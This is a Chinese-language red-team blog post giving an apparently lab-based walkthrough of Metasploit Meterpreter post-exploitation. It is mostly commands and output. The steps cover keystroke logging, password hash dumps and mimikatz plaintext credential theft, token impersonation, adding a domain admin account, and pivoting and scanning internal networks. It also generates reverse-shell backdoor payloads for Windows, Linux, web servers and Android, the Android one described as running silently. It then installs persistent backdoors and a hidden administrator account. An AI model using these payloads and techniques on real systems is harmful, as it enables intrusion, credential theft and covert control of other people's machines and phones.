红日攻防实验室

红日攻防实验室



Meterpreter安全笔记(一)

Meterpreter
1.Meterpreter是什么?
仅仅是驻留在内存的shellcode。。
它比一般的攻击手法要好一些,一般的payload是这么工作的:
2.Meterpreter常用命令
文件系统命令:
cat c:boot.ini # 查看文件内容
getwd # 查看当前工作目录 work directory
upload /root/Desktop/netcat.exe c: # 上传文件到目标机上
download nimeia.txt /root/Desktop/ # 下载文件到本机上
edit c:boot.ini # 编辑文件
search -d c:windows -f *.mdb # search 文件

网络命令:
ipconfig / ifconfig # 查看网络接口信息
portfwd add -l 5555 -p 3389 -r 192.168.198.129 # 端口转发,本机监听5555,把目标机3389转到本机5555
root@bt:~# rdesktop -u Administrator -p 123qwe 127.0.0.1:5555
route # 获取路由表信息
系统命令:
ps # 查看当前活跃进程
migrate pid # 将Meterpreter会话移植到进程数位pid的进程中
execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
getpid # 获取当前进程的pid
kill pid # 杀死进程
getuid # 查看权限
sysinfo # 查看目标机系统信息,如机器名,操作系统等
shutdown # 关机
键盘命令
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
dir <Return> cd <Ctrl> <LCtrl>
meterpreter > keyscan_stop
Stopping the keystroke sniffer...
获取hash
meterpreter > run post/windows/gather/smart_hashdump
[*] Running module against TESTING
[*] Hashes will be saved to the database if one is connected.
[*] Hashes will be saved in loot in JtR password file format to:
[*] /home/croxy/.msf4/loot/20150929225044_default_10.0.2.15_windows.hashes_407551.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8c2c8d96e92a8ccfc407a1ca48531239...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
[+] Croxy:"Whoareyou"
[*] Dumping password hashes...
[+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:e3f0347f8b369cac49e62a18e34834c0:::
[+] test123:1003:aad3b435b51404eeaad3b435b51404ee:0687211d2894295829686a18ae83c56d:::hash

获取明文
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM

meterpreter > load mimikatz
Loading extension mimikatz...success.
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials

meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials

kerberos credentials

meterpreter > mimikatz_command -f samdump::hashes
Ordinateur : Testing
BootKey : 8c2c8d96e92a8ccfc407a1ca48531239

meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { Croxy ; Testing ; hehe }
[1] { test ; Testing ; test }
通过Hash获取权限
use exploit/windows/smb/psexec
内网代理
Windows
meterpreter > run autoroute -s 10.42.0`.54
[*] Adding a route to 10.42.0.54/255.255.255.0...
[+] Added route to 10.42.0.54/255.255.255.0 via 10.42.0.54
[*] Use the -p option to list all active routes
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > show options

Module options (auxiliary/server/socks4a):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The address to listen on
SRVPORT 1080 yes The port to listen on.

Auxiliary action:
Name Description
---- -----------
Proxy

msf auxiliary(socks4a) > route print

Active Routing Table

Subnet Netmask Gateway
------ ------- -------
10.42.0.54 255.255.255.0 Session 1

msf auxiliary(socks4a) > ifconfig
[*] exec: ifconfig

msf auxiliary(socks4a) > set SRVHOST xxx.xxx.xx.xx
SRVHOST => xxx.xxx.xx.xx (xxx.xxx.xx.xx为自己运行msf的vps机子)

msf auxiliary(socks4a) > exploit
[*] Auxiliary module execution completed
[*] Starting the socks4a proxy server
之后使用proxychains 设置socks4代理 链接vps上的1080端口 就可以访问内网了
SSH代理
msf > load meta_ssh
msf > use multi/ssh/login_password
msf > set RHOST 192.168.56.3
RHOST => 192.168.56.3
msf > set USER test
USER => test
msf > set PASS reverse
PASS => reverse
msf > set PAYLOAD ssh/metassh_session
PAYLOAD => ssh/metassh_session
msf > exploit -z
[*] Connecting to dsl@192.168.56.3:22 with password reverse
[*] metaSSH session 1 opened (127.0.0.1 -> 192.168.56.3:22) at 2011-12-28 03:51:16 +1300
[*] Session 1 created in the background.
msf > route add 192.168.57.0 255.255.255.0 1
之后就是愉快的内网扫描了
当然还是推荐直接用
ssh -f -N -D 127.0.0.1:6666 test@103.224.81.1.1
偷取Token
meterpreter>ps #查看目标机器进程,找出域控账户运行的进程ID
meterpreter>steal_token pid
方法2
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM
meterpreter > load incognito
Loading extension incognito...success.
meterpreter > list_tokens -u

Delegation Tokens Available

IIS APPPOOLzyk
NT AUTHORITYIUSR
NT AUTHORITYLOCAL SERVICE
NT AUTHORITYNETWORK SERVICE
NT AUTHORITYSYSTEM
QLWEBAdministrator

Impersonation Tokens Available

NT AUTHORITYANONYMOUS LOGON

meterpreter > impersonate_token QLWEB\Administrator
[+] Delegation token available
[+] Successfully impersonated user QLWEBAdministrator
meterpreter > getuid
Server username: QLWEBAdministrator
meterpreter>add_user 0xfa funny –h192.168.3.98 #在域控主机上添加账户
meterpreter>add_group_user “DomainAdmins” 0xfa –h192.168.3.98 #将账户添加至域管理员组
内网扫描
meterpreter > run autoroute -s 192.168.3.98
meterpreter > background
[*] Backgrounding session 2...
msf exploit(handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set PORTS 80,8080,21,22,3389,445,1433,3306
PORTS => 80,8080,21,22,3389,445,1433,3306
msf auxiliary(tcp) > set RHOSTS 192.168.3.1/24
RHOSTS => 192.168.3.1/24
msf auxiliary(tcp) > set THERADS 10
THERADS => 10
msf auxiliary(tcp) > exploit

一些常用破解模块
auxiliary/admin/realvnc_41_bypass (Bypass VNCV4网上也有利用工具)
auxiliary/admin/cisco/cisco_secure_acs_bypass (cisco Bypass 版本5.1或者未打补丁5.2版 洞略老)
auxiliary/admin/http/jboss_deploymentfilerepository (内网遇到Jboss最爱:))
auxiliary/admin/http/dlink_dir_300_600_exec_noauth (Dlink 命令执行:)
auxiliary/admin/mssql/mssql_exec (用爆破得到的sa弱口令进行执行命令 没回显:()
auxiliary/scanner/http/jboss_vulnscan (Jboss 内网渗透的好朋友)
auxiliary/admin/mysql/mysql_sql (用爆破得到的弱口令执行sql语句:)
auxiliary/admin/oracle/post_exploitation/win32exec (爆破得到Oracle弱口令来Win32命令执行)
auxiliary/admin/postgres/postgres_sql (爆破得到的postgres用户来执行sql语句)
扫描模块
auxiliary/scanner/rsync/modules_list (Rsync)
auxiliary/scanner/misc/redis_server (Redis)
auxiliary/scanner/ssl/openssl_heartbleed (心脏滴血)
auxiliary/scanner/mongodb/mongodb_login (Mongodb)
auxiliary/scanner/elasticsearch/indices_enum (elasticsearch)
auxiliary/scanner/http/axis_local_file_include (axis本地文件包含)
auxiliary/scanner/http/http_put (http Put)
auxiliary/scanner/http/gitlab_user_enum (获取内网gitlab用户)
auxiliary/scanner/http/jenkins_enum (获取内网jenkins用户)
auxiliary/scanner/http/svn_scanner (svn Hunter :))
auxiliary/scanner/http/tomcat_mgr_login (Tomcat 爆破)
auxiliary/scanner/http/zabbix_login (Zabbix :))
我们给命令们排个龙虎榜吧:
第一名:ps + migrate ,因为我们是通过IE进来的,如果IE关掉了呢?如果它再也不访问那个hook页面了,我们岂不是再也get不了shell了。。
所以应该早早移植到别的进程空间,如Explorer.exe,这它不去关掉吧。。
第二名:execute ,能cmd.exe
第三名:portfwd ,端口转发,现实中基本都是要转发的~
3.Meterpreter与后渗透攻击模块
AUX辅助模块 信息搜集
Exploit模块 渗透攻击
后渗透模块 主机控制与拓展攻击的渗透测试全过程支持
Meterpreter 是Metasploit的一个payload,只是比较强大很多而已。它与后渗透模块的关系就是,前者是后者的 实施通道 。

接下来就介绍可以生成后门的payload
<h2>msfpayload msfvenom</h2>
1.msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=2013 X > file.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"192.168.111.129", "LPORT"=>"2013"}
2.msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.7.102 LPORT=5555 X > linux2
3.root@bt:~# msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LHOST=10.0.0.1 LPORT=5555 R | msfencode -a x86 -e x86/alpha_mixed -k -x /bin/netcat -t elf -o nc
4.msfpayload java/jsp_shell_reverse_tcp LHOST=10.1.1.1 LPORT=5555 R > door.jsp
5.msfpayload linux/x86/shell_reverse_tcp LHOST=10.0.0.1 LPORT=5555 W > door.war
6.msfpayload php/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e php/base64 -t raw -o base64php.php
7.msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e x86/shikata_ga_nai -a x86 -t asp -o door2.asp
8.msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=5555 R | msfencode -t exe -c 5 > /root/Desktop/door.exe
出了生成以上8种payload以外,我们还可以生成手机的payload。手机payload主要是android的,目前ios没有尝试过。
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.42.0.1 LPORT=23333 -o ~/Desktop/1234.apk
生成后 手机点击app无任何反应 app就默默的后台运行 干啥都行:)
在手机运行payload以后,我们需要打开msf来进行监听,相应的监听程序如下。

msf > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 23333
LPORT => 23333
msf exploit(handler) > set LHOST 10.42.0.1
LHOST => 10.42.0.1
msf exploit(handler) > exploit

<h2>实战部分</h2>

首先我们生成一个payload file.exe ,然后在相应的windows上面执行这个exe文件,监听程序就回返回一个meterpreter。
然后设置监听
kali-Sec-redClub:~# msfconsole
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.111.129
LHOST => 192.168.111.129
msf exploit(handler) > set LPORT 2013
LPORT => 2013
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.111.129:2013
[*] Starting the payload handler...
然后在Windows2003上执行file.exe
返回一个meterpreter
[*] Sending stage (769024 bytes) to 192.168.111.133
[*] Meterpreter session 1 opened (192.168.111.129:2013 -> 192.168.111.133:49168) at 2014-03-13 22:23:18 +0800
meterpreter >

程序运行完以后,成功返回。

(1).转移meterpreter到其他进程

在渗透过程中由于各种原因,当前meterpreter进程很容易被干掉,将meterpreter转移到系统常驻进程是个好主意
meterpreter > getuid //查看当前权限
Server username: WIN-K30V5SI0PCEAdministrator
meterpreter > ps //列出当前进程

============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process] 4294967295
4 0 System x86_64 0
244 4 smss.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32smss.exe
264 492 svchost.exe x86_64 0 NT AUTHORITYLOCAL SERVICE C:WindowsSystem32svchost.exe
336 328 csrss.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32csrss.exe
388 380 csrss.exe x86_64 1 NT AUTHORITYSYSTEM C:WindowsSystem32csrss.exe
396 328 wininit.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32wininit.exe
432 380 winlogon.exe x86_64 1 NT AUTHORITYSYSTEM C:WindowsSystem32winlogon.exe
492 396 services.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32services.exe
meterpreter > migrate 2044 //迁移到PID为2044的explorer进程
[*] Migrating from 2332 to 2044...
[*] Migration completed successfully.
meterpreter >

验证
meterpreter > ps

============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process] 4294967295
4 0 System x86_64 0
244 4 smss.exe x86_64 0 NT AUTHORITYSYSTEM SystemRootSystem32smss.exe
264 492 svchost.exe x86_64 0 NT AUTHORITYLOCAL SERVICE C:Windowssystem32svchost.exe
336 328 csrss.exe x86_64 0 NT AUTHORITYSYSTEM C:Windowssystem32csrss.exe
如上所示file.exe进程已经没了。需要注意的是如果存在杀软的话可能会阻止进程注入
(2).测试是不是虚拟机
meterpreter > run post/windows/gather/checkvm
[*] Checking if WIN-K30V5SI0PCE is a Virtual Machine .....
[*] This is a VMware Virtual Machine
meterpreter >
我的2003是装在VMWare上的
**

(3).安装后门

**
方法一:persistence方法
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.
OPTIONS:

-A        Automatically start a matching multi/handler to connect to the agent
-L <opt>  Location in target host where to write payload to, if none %TEMP% will be used.
-P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
-S        Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt>  Alternate executable template to use
-U        Automatically start the agent when the User logs on
-X        Automatically start the agent when the system boots
-h        This help menu
-i <opt>  The interval in seconds between each connection attempt
-p <opt>  The port on the remote host where Metasploit is listening
-r <opt>  The IP of the system running Metasploit listening for the connect back

meterpreter >
执行
meterpreter > run persistence -X -i 10 -p 2241 -r 192.168.111.129
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-K30V5SI0PCE_20140313.5419/WIN-K30V5SI0PCE_20140313.5419.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=2241
[*] Persistent agent script is 148439 bytes long
[+] Persistent Script written to C:UsersADMINI~1AppDataLocalTempUhyxOTTzTb.vbs
[*] Executing script C:UsersADMINI~1AppDataLocalTempUhyxOTTzTb.vbs
[+] Agent executed with PID 2916
[*] Installing into autorun as HKLMSoftwareMicrosoftWindowsCurrentVersionRunHstWtPyXHYnhQ
[+] Installed into autorun as HKLMSoftwareMicrosoftWindowsCurrentVersionRunHstWtPyXHYnhQ
meterpreter >
现在退出服务器
重新配置监听器
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.111.129
LHOST => 192.168.111.129
msf exploit(handler) > set LPORT 2241
LPORT => 2241
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.111.129:2241
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.111.133
[*] Meterpreter session 1 opened (192.168.111.129:2241 -> 192.168.111.133:49159) at 2014-03-13 23:01:55 +0800

meterpreter >
如图,反弹成功,这个被动型的后门在某些特殊的场合会是个不错的选择.
方法二
Metsvc
meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:UsersADMINI~1AppDataLocalTempHzWbqqRpuBlxn...
[*] >> Uploading metsrv.x86.dll...
[*] >> Uploading metsvc-server.exe...
[*] >> Uploading metsvc.exe...
[*] Starting the service...

 * Installing service metsvc
  • Starting service
    Service metsvc successfully installed.

meterpreter >
metsvc后门安装成功,接下来是连接
Kali-Sec-redClub:~# msfconsole

 ,           ,
/             

((__---,,,---__))

  (_) O O (_)_________
      _ /            |
      o_o    M S F   | 
              _____  |  *
            |||   WW|||
            |||     |||

Using notepad to track pentests? Have Metasploit Pro report on hosts,
services, sessions and evidence -- type 'go_pro' to launch it now.

   =[ metasploit v4.8.1-2013120401 [core:4.8 api:1.0]
  • -- --=[ 1239 exploits - 755 auxiliary - 207 post
  • -- --=[ 324 payloads - 31 encoders - 8 nops

msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------

Payload options (windows/metsvc_bind_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LPORT 4444 yes The listen port
RHOST no The target address

Exploit target:

Id Name
-- ----
0 Wildcard Target

msf exploit(handler) > set RHOST 192.168.111.133
RHOST => 192.168.111.133
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > exploit

[*] Started bind handler
[*] Starting the payload handler...
[*] Meterpreter session 1 opened (192.168.111.129:49313 -> 192.168.111.133:31337) at 2014-03-13 23:12:54 +0800

meterpreter >
方法三:
这个是类似于添加账户3389远程连接
meterpreter > run getgui -u zero -p haizeiwang123_
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Setting user account for logon
[*] Adding User: zero with Password: haizeiwang123_
[*] Hiding user from Windows Login screen
[*] Adding User: zero to local group 'Remote Desktop Users'
[*] Adding User: zero to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20140314.4134.rc
meterpreter >

**

(4).端口转发

**

主机处于内网也是比较常见的,metasploit自带了一个端口转发工具

meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]

OPTIONS:

-L  opt  The local host to listen on (optional).
-h        Help banner.
-l  opt  The local port to listen on.
-p  opt  The remote port to connect to.
-r  opt  The remote host to connect to.

meterpreter > portfwd add -L 1234 -p 3389 -r 192.168.111.133
[-] You must supply a local port, remote host, and remote port.
meterpreter > portfwd add -l 1234 -p 3389 -r 192.168.111.133
[*] Local TCP relay created: 0.0.0.0:1234 <-> 192.168.111.133:3389
meterpreter >
接下来运行
rdesktop -u zero -p haizeiwang123_ 127.0.0.1:1234
**

(5).获取密码

**
法国神器mimikatz可以直接获得操作系统的明文密码,meterpreter添加了这个模块
首先加载mimikatz模块
由于我的Windows 2008是64位的,所以先要转移到64位进程
meterpreter > ps

......
2000 472 dllhost.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32dllhost.exe
2264 1832 explorer.exe x86_64 2 WIN-K30V5SI0PCEzero C:Windowsexplorer.exe
2292 2264 vmtoolsd.exe x86_64 2 WIN-K30V5SI0PCEzero C:Program FilesVMwareVMware Toolsvmtoolsd.exe
2520 372 FfBoPtYGlNj.exe x86 1 WIN-K30V5SI0PCEAdministrator C:UsersADMINI~1AppDataLocalTemp1rad87A98.tmpFfBoPtYGlNj.exe
2780 2256 winlogon.exe x86_64 2 NT AUTHORITYSYSTEM C:WindowsSystem32winlogon.exe
3028 880 dwm.exe x86_64 2 WIN-K30V5SI0PCEzero C:WindowsSystem32dwm.exe

meterpreter > migrate 2780
[*] Removing existing TCP relays...
[*] Successfully stopped TCP relay on 0.0.0.0:1234
[*] 1 TCP relay(s) removed.
[*] Migrating from 1428 to 2264...
[*] Migration completed successfully.
[*] Recreating TCP relay(s)...
[*] Local TCP relay recreated: 0.0.0.0:1234 <-> 192.168.111.133:3389
meterpreter > load mimikatz
Loading extension mimikatz...success.
meterpreter >
获取密码哈希
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials

===============

AuthID Package Domain User Password
------ ------- ------ ---- --------
0;339062 NTLM WIN-K30V5SI0PCE Administrator lm{ 179b3f1af1324ade301c14040883a0d8 }, ntlm{ 358c0a328bdf6b42185ca0a1773fb0be }
0;593431 NTLM WIN-K30V5SI0PCE zero lm{ bc61a4bbe791e26298911297f380ff1b }, ntlm{ 880be0798a0d1caebdf913bfcc28e1ad }
0;593459 NTLM WIN-K30V5SI0PCE zero lm{ bc61a4bbe791e26298911297f380ff1b }, ntlm{ 880be0798a0d1caebdf913bfcc28e1ad }
0;995 Negotiate NT AUTHORITY IUSR n.s. (Credentials KO)
0;996 Negotiate WORKGROUP WIN-K30V5SI0PCE$ n.s. (Credentials KO)
0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO)
0;47971 NTLM n.s. (Credentials KO)
0;999 NTLM WORKGROUP WIN-K30V5SI0PCE$ n.s. (Credentials KO)
获取明文密码
meterpreter > kerberos

====================

AuthID Package Domain User Password
------ ------- ------ ---- --------
0;999 NTLM WORKGROUP WIN-K30V5SI0PCE$
0;996 Negotiate WORKGROUP WIN-K30V5SI0PCE$
0;47971 NTLM
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;995 Negotiate NT AUTHORITY IUSR
0;339062 NTLM WIN-K30V5SI0PCE Administrator ceshimima123_
0;593459 NTLM WIN-K30V5SI0PCE zero haizeiwang123_
0;593431 NTLM WIN-K30V5SI0PCE zero haizeiwang123_
主要来搞域控,是非常好的工具。
http://drops.wooyun.org/tips/7547 mimikatz
最后我们会给大家搭建一个域控的环境,来进行实战演练。

 标签: 内网安全

作者  :  redBu11



关于我

about me

redBu11

联系我